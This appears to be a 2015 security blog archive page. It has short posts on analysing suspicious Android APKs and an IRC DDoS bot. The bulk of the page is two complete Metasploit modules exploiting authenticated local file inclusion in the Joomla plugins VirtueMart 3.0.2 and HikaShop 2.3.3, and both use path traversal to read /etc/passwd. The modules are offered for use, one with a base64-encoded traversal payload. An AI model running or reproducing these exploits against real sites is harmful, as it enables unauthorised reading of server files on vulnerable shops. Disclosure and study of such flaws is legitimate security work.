Wednesday, 28 January 2015

[PL] Analiza aplikacji atticlab.bodyscanner.apk



W tym krótkim poście wyjaśnię sposób w jaki sprawdzałem co robi aplikacja atticlab.bodyscanner.apk. Plik znalazłem przeglądając stronę http://contagiodump.blogspot.com/ [1] - dzięki za próbki!


  
Spis treści:

Sunday, 18 January 2015

[EN] kmt.apk - what's this?

Few days ago I found application for android named 'kmt.apk'.

I was wondering, what this app is doing... To check it, I used apktool.

Listing of files showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:
AndroidManifest.xml

After checking that this app needs my location (or location of my phone),
I was curious, where (all?) those data are going. This is what I found:

jd-gui in action

jd-gui in action - sending params...

jd-gui in action - sending params...

Another one:
onCreate function


And that's how I found this link :)

So it seems that this application is checking information about your localization on your
phone, and sending them to this "erotte" web. For now we're done here. ;)

If you will have some nice APK files to analyse, let me know via email. Thanks.

Cheers,
o/

[EN] Checking Illusion Bot

I was checking other stuff, and suddenly found "Illusion Bot". Seems to be a small IRC DDoS Bot. ;]

Let see...

Download:
You can easily find it on the web





Unzipped it looks like this:

Unzipped

I decide to check webfiles first... but I don't understand all of it... ;]

Sorry - don't understand

So I decide to use nice and friendly 'string' command. Connected with few grep's:

Commands to use for this bot
 Of course in those PHP files (index.php and upgrade.php) you can find more things, like
how this backdoor is installing itself in the WWW server, or how it's sending commands, etc.

Bots tables
Base64 decoded files, now looks like this:



...and commands again:





Point of view from IDA:




And this is my favourite :D

can you see it? ;)




More, maybe soon. ;)

Cheers,
o/

Monday, 12 January 2015

[EN] VirtueMart 3 - LFI for Metasploit

Regarding to last few posts, below you can find another small poc exploit for LFI vulnerability found in latest (this time) VirtueMart (3.0.2).

Because it's for Joomla again, again it's based on HikaShop LFI poc.

Enjoy:

Preparing to exploit...

Raw results

And the code:
---<virtuemart_auth_lfi.rb>---

root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
        'Description' => %q{
                VirtueMart 3.0.2 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                More here: https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery
                                                  # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => ' 23.12.2014'))
      register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
      ], self.class)
    end

  def check
  end

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end


  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Good: " + req1.code.to_s)
    print_good("[+] Got cookie(s): " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Got token: "+ token.to_s)
    else
      print_status("[-] Token not found")
    end


    # now we need to do auth using that token and cookies
    print_status("[+] Trying to auth...")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)


    # 3rd step: get + post params to lfi
    print_good('[+] Exploit...')
    readthis =  "../../../../../../../../../../../../../../../../../../etc/passwd"

    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_virtuemart',
                 'view'  => 'log',
                 'task'  => 'edit',
                 'logfile'    => readthis
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] Exploit response code: " + xpl.code.to_s)
      print_good("[+] Response body after attack:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit

end

---<virtuemart_auth_lfi.rb>---

Pastebin version is here.


Cheers,
o/

Saturday, 3 January 2015

[EN] HikaShop LFI - Metasploit module

Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.

Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.

Below you will find a dirty MSF poc for LFI vulnerability located in HikaShop 2.3.3. ;)

Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just check how I've done that before or feel free to contact me with any questions/suggestions.

Loading exploit:

Running:





... and finally we will get the content of /etc/passwd:




Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HikaShop - LFI poc for authenticated users',
        'Description' => %q{
                HikaShop 2.3.3 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '03.01.2015'))
      register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
        OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
      ], self.class)
    end

  def check
  end

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end


  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Resp code: " + req1.code.to_s)
    print_good("[+] Cookie(s) : " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : "+ token.to_s)
    else
      print_status("[-] Token not found")
    end


    # now we need to do auth using that token and cookies
    print_status("[+] 2nd request (post with auth)")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)


    # 3rd step: get + post params to lfi
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_hikashop',
                 'ctrl'  => 'view',
                 'task'  => 'edit',
                 'id'    => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] 3rd response code: " + xpl.code.to_s)
      print_good("[+] 3rd (full) response body:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit

end
 
---<hikashop_auth_lfi.rb>---

And pastebin version is here.

Happy New Year! ;)